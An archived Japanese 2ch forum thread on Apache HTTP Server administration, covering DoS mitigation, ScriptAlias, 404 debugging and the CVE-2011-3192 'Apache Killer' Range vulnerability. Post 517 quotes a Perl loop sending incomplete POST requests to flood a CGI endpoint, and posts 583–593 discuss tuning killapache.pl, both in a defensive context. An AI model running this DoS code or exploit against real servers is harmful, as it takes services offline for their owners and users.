トップページunix
982コメント316KB

Apache関連 Part11

■ このスレッドは過去ログ倉庫に格納されています
0001名無しさん@お腹いっぱい。2008/09/30(火) 08:11:00
HTTP ServerのApacheに関する話題を扱うスレッドです。
http://httpd.apache.org/

●インストール済みApacheの詳細情報の調べ方
httpd -h 簡易ヘルプ
httpd -v バージョン情報
httpd -V コンパイル条件など詳細な情報
httpd -l 静的リンクされたモジュール一覧
httpd -M 現在の設定ファイルで読み込まれるモジュール(2.2以降)

●公式マニュアル
http://httpd.apache.org/docs/1.3/ Apache 1.3
http://httpd.apache.org/docs/2.0/ Apache 2.0
http://httpd.apache.org/docs/2.2/ Apache 2.2

●ディレクティブ一覧
http://httpd.apache.org/docs/1.3/mod/directives.html
http://httpd.apache.org/docs/2.0/mod/quickreference.html
http://httpd.apache.org/docs/2.2/mod/quickreference.html

前スレッド
Apache関連 Part10
http://pc11.2ch.net/test/read.cgi/unix/1179627714/
0503名無しさん@お腹いっぱい。2011/07/24(日) 13:08:54.97
それはファイヤーウォールの仕事では
0504名無しさん@お腹いっぱい。2011/07/24(日) 13:29:08.34
その手があったか。ありがとう
0505名無しさん@お腹いっぱい。2011/07/24(日) 14:18:19.69
http://httpd.apache.org/docs/trunk/misc/security_tips.html#dos
0506名無しさん@お腹いっぱい。2011/07/24(日) 18:05:28.86
なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな
0507名無しさん@お腹いっぱい。2011/07/24(日) 20:34:50.64
>>506
そんな感じですね。

ぼんやりしたやり取りがたまらないw
0508名無しさん@お腹いっぱい。2011/07/25(月) 00:12:09.07
うちは帯域制御はmod_cband
DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ
0509名無しさん@お腹いっぱい。2011/07/25(月) 00:22:08.76
たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ
0510名無しさん@お腹いっぱい。2011/07/25(月) 01:21:57.68
>>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
http://d.hatena.ne.jp/dayflower/20081029/1225266220
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって
0511名無しさん@お腹いっぱい。2011/07/25(月) 01:24:03.92
>>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww
0512名無しさん@お腹いっぱい。2011/07/25(月) 02:28:49.74
分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。
0513名無しさん@お腹いっぱい。2011/07/25(月) 03:15:04.58
>>511
だったら作って有名になってみればいいじゃんw
05145092011/07/25(月) 10:37:52.60
ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒
0515名無しさん@お腹いっぱい。2011/07/25(月) 11:56:14.21
2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。
0516名無しさん@お腹いっぱい。2011/08/04(木) 07:37:37.77
449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。
0517名無しさん@お腹いっぱい。2011/08/04(木) 07:39:45.57
こんな感じなんだけどどうやったら対策できる?
攻撃元のスクリプトは以下

433 名無しさん@お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: http://$sv" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};
0518名無しさん@お腹いっぱい。2011/08/04(木) 10:17:16.26
slowloris 対策なら RequestReadTimeout で。
0519名無しさん@お腹いっぱい。2011/08/04(木) 10:38:02.85
>>518
ありがとう
0520名無しさん@お腹いっぱい。2011/08/07(日) 14:40:43.49
ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか?
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

http://en.wikipedia.org/wiki/Keepalive
0521名無しさん@お腹いっぱい。2011/08/07(日) 15:23:57.31
TCP keepaliveの説明を引用してくるバカがおる
0522名無しさん@お腹いっぱい。2011/08/07(日) 17:14:40.13
フイタw
0523名無しさん@お腹いっぱい。2011/08/09(火) 04:00:06.70
wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか?
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか?
05245092011/08/09(火) 10:40:40.07
UAとかホスト名指定とかじゃあ?
0525名無しさん@お腹いっぱい。2011/08/10(水) 03:24:02.30
Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
http://hibari.2ch.net/test/read.cgi/unix/1305422004/l50
0526名無しさん@お腹いっぱい。2011/08/10(水) 22:09:42.74
ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね
0527名無しさん@お腹いっぱい。2011/08/10(水) 23:46:51.84
何を返してくるかは相手次第だろうに403と決めてかかるとかw
0528名無しさん@お腹いっぱい。2011/08/11(木) 00:04:53.56
403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね?
0529名無しさん@お腹いっぱい。2011/08/11(木) 10:41:31.12
ErrorDocumentを指定していてその先で404にすげ替えるとか。
0530名無しさん@お腹いっぱい。2011/08/11(木) 12:15:38.68
>>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ?
0531名無しさん@お腹いっぱい。2011/08/11(木) 13:36:22.24
528は恥ずかしくてつい恥の上塗りでしょ
0532名無しさん@お腹いっぱい。2011/08/13(土) 04:50:07.44
fc2とかリファラで404返してくるじゃん
0533名無しさん@お腹いっぱい。2011/08/18(木) 10:42:17.44
違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに http://unko/ というアクセスがあったとき
200でなく404とか適切なエラーを返したい
0534名無しさん@お腹いっぱい。2011/08/18(木) 10:43:51.16
VirtualHost
0535名無しさん@お腹いっぱい。2011/08/18(木) 18:25:43.83
Hostヘッダーを見てはじけばいい
0536名無しさん@お腹いっぱい。2011/08/25(木) 21:34:02.90
CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x


1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。
0537名無しさん@お腹いっぱい。2011/08/25(木) 22:01:49.96
【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」 お前らのサーバの危険が危ない
http://hatsukari.2ch.net/test/read.cgi/news/1314272986/
0538名無しさん@お腹いっぱい。2011/08/25(木) 23:31:09.77
赤帽パッチまだー( ゚д゚)
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192
0539名無しさん@お腹いっぱい。2011/08/26(金) 10:04:21.25
お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな
0540名無しさん@お腹いっぱい。2011/08/26(金) 11:57:53.46
2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。
0541名無しさん@お腹いっぱい。2011/08/26(金) 21:29:06.82
>>536
それ対策なってねーぞw
0542名無しさん@お腹いっぱい。2011/08/26(金) 22:36:22.12
Apache HTTPD Security ADVISORY
==============================
UPDATE 2

なんてのを用意中ぽいな
workaroundも修正されとるでぇ
ttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3CF0328A02-507F-42F6-A99E-EC2F30733BB7@bbc.co.uk%3E
0543名無しさん@お腹いっぱい。2011/08/26(金) 23:00:52.14
既にannounceに流れてた
http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110826103531.998348F82@minotaur.apache.org%3E

ということで
>>536
はネタが古い
0544名無しさん@お腹いっぱい。2011/08/26(金) 23:50:02.78
WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな
0545名無しさん@お腹いっぱい。2011/08/27(土) 09:17:11.02
>>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ?
0546名無しさん@お腹いっぱい。2011/08/27(土) 09:59:14.61
httpd-devはヲチっとけ
0547名無しさん@お腹いっぱい。2011/08/29(月) 18:31:37.90
LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてOK?

なんか気を付けることがあったらおしえてください。
0548名無しさん@お腹いっぱい。2011/08/29(月) 18:50:36.98
まずはドキュメント読みなよ。
0549名無しさん@お腹いっぱい。2011/08/29(月) 19:00:03.08
>548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か?は書いてないですよね?

ノウハウっぽいところがあるのかな?と。
0550名無しさん@お腹いっぱい。2011/08/29(月) 19:29:15.16
「××する機能」がいらないなら止めていいんじゃね。
0551名無しさん@お腹いっぱい。2011/08/29(月) 19:43:26.29
全部コメントアウトして、動くようになるまで追加する。
0552名無しさん@お腹いっぱい。2011/08/29(月) 19:46:34.21
モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。
0553名無しさん@お腹いっぱい。2011/08/29(月) 21:15:45.17
>550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな?
0554名無しさん@お腹いっぱい。2011/08/29(月) 23:02:41.02
ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ
0555名無しさん@お腹いっぱい。2011/08/30(火) 11:10:26.12
apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか?
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか?

教えていただきたいです。
0556名無しさん@お腹いっぱい。2011/08/30(火) 11:20:54.28
>>555
っ ScriptAlias
05575552011/08/30(火) 12:28:42.47
>>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか?
0558名無しさん@お腹いっぱい。2011/08/30(火) 13:28:23.86
>>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。
05595552011/08/30(火) 14:09:15.85
>>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか?
0560名無しさん@お腹いっぱい。2011/08/30(火) 14:21:51.67
>>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。
05615552011/08/30(火) 14:34:43.13
>>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。
0562名無しさん@お腹いっぱい。2011/08/30(火) 14:46:50.14
http://httpd.apache.org/docs/2.2/misc/security_tips.html#nsaliasedcgi
0563名無しさん@お腹いっぱい。2011/08/31(水) 10:38:02.43
2.2.20
0564名無しさん@お腹いっぱい。2011/08/31(水) 11:02:44.56
早速上げたった。
テストは面倒だからしてない(・∀・)y‐┛~~
0565名無しさん@お腹いっぱい。2011/08/31(水) 14:52:22.61
1.3系使ってる人はどうするの?
まだまだ沢山いると思うんだけど...
0566名無しさん@お腹いっぱい。2011/08/31(水) 15:02:26.97
いいかげん 2.x に乗り換えれ。
0567名無しさん@お腹いっぱい。2011/08/31(水) 15:06:53.44
自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...
0568名無しさん@お腹いっぱい。2011/08/31(水) 15:07:58.37
1.3系のパッチの予定はないのかな?
0569名無しさん@お腹いっぱい。2011/08/31(水) 17:54:52.56
ないよ。
0570名無しさん@お腹いっぱい。2011/08/31(水) 23:31:26.50
赤帽バッチまだー
>>538
0571名無しさん@お腹いっぱい。2011/09/01(木) 03:47:35.52
2.2.20速いぞ
0572名無しさん@お腹いっぱい。2011/09/01(木) 10:45:44.80
>>570
来たよ。
http://rhn.redhat.com/errata/RHSA-2011-1245.html
0573名無しさん@お腹いっぱい。2011/09/01(木) 11:18:40.39
2.0系のパッチの予定はないのかな?
0574名無しさん@お腹いっぱい。2011/09/01(木) 11:40:51.42
自分でバックポートしれ そして配布しれ
0575名無しさん@お腹いっぱい。2011/09/01(木) 12:11:51.87
>>573
RHEL4.xのパッチをパクればOK
0576名無しさん@お腹いっぱい。2011/09/01(木) 12:29:35.32
2.0.x は出す
1.3.x は出さないと言ってた気がする
0577名無しさん@お腹いっぱい。2011/09/01(木) 12:39:32.05
早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの?
0578名無しさん@お腹いっぱい。2011/09/01(木) 13:12:44.86
>>577
2ch とか?
0579名無しさん@お腹いっぱい。2011/09/01(木) 13:15:49.58
>>574>>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。
0580名無しさん@お腹いっぱい。2011/09/01(木) 14:41:38.01
http://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/httpd-2.2.3-53.el5_7.1.src.rpm
0581名無しさん@お腹いっぱい。2011/09/01(木) 14:43:16.08
>>580
とつぜんどうしたの。
0582名無しさん@お腹いっぱい。2011/09/01(木) 14:48:35.43
ウフフ
0583名無しさん@お腹いっぱい。2011/09/01(木) 18:50:37.25
Apache Killerの件で
落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか?
0584名無しさん@お腹いっぱい。2011/09/01(木) 20:19:33.78
つまり1.3最強という事ですね。
0585名無しさん@お腹いっぱい。2011/09/01(木) 20:26:28.53
1.3はinetdモード使えるから今でも重宝してる
0586名無しさん@お腹いっぱい。2011/09/01(木) 20:35:48.51
>>585
なんでinetdモード使ってるの?
0587名無しさん@お腹いっぱい。2011/09/01(木) 20:38:22.72
ちゃんとプロセス数増やしてメモリ潰さないと止まらないっしょ
0588名無しさん@お腹いっぱい。2011/09/01(木) 21:50:55.78
>>586
TCP Wrapper が使いたいとか?
0589名無しさん@お腹いっぱい。2011/09/01(木) 22:15:07.02
>>583
ここが参考になるかも
http://blog.tokumaru.org/2011/08/apache-killerapache-killer.html
0590名無しさん@お腹いっぱい。2011/09/01(木) 22:40:19.55
583です。
MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {

for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか?
0591名無しさん@お腹いっぱい。2011/09/01(木) 22:45:57.52
>>590
http://people.apache.org/~dirkx/CVE-2011-3192.txt
0592名無しさん@お腹いっぱい。2011/09/01(木) 23:09:15.40
>>591
583です。

そんな今さら・・・

Apache 1.3 is NOT vulnerable.
えっ!?

UPDATE2までしか見ていませんでした。
ありがとうございました!
0593名無しさん@お腹いっぱい。2011/09/01(木) 23:40:13.17
わかりました。apache_1.3.42 に戻します。
0594名無しさん@お腹いっぱい。2011/09/02(金) 01:22:26.29
1.3系試してないねぇ
ttp://www.jpcert.or.jp/at/2011/at110023.html
0595名無しさん@お腹いっぱい。2011/09/02(金) 08:36:48.74
え?1.3系は大丈夫だったの?
0596名無しさん@お腹いっぱい。2011/09/03(土) 12:23:58.91
http://huge.shit.com/test.php -> 200 OK
http://huge.shit.com/test.php?param=xxx -> 404 Not Found
http://<;上記ドメインのIP>/test.php -> 200 OK
http://<;上記ドメインのIP>/test.php?param=xxx -> 200 OK

Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで?誰か教えて!
0597名無しさん@お腹いっぱい。2011/09/03(土) 12:39:44.97
ログ読んでみたら。
0598名無しさん@お腹いっぱい。2011/09/03(土) 12:45:11.61
ログは File is not found が並んでるだけなんだよね。
ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。
0599名無しさん@お腹いっぱい。2011/09/03(土) 13:44:17.55
何も変更してないならrestartしてみたら?
0600名無しさん@お腹いっぱい。2011/09/03(土) 13:48:55.99
restartはしたんすよ。変わらずです。
おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。
0601名無しさん@お腹いっぱい。2011/09/03(土) 14:14:14.82
書き換えた人に聞いた方が早くない?
confの日付で実際更新されてるか分かるだろうし。
0602名無しさん@お腹いっぱい。2011/09/03(土) 14:21:53.08
>>596

Rewrite使ってる?
Apache Killerの件で設定変えたとか。
■ このスレッドは過去ログ倉庫に格納されています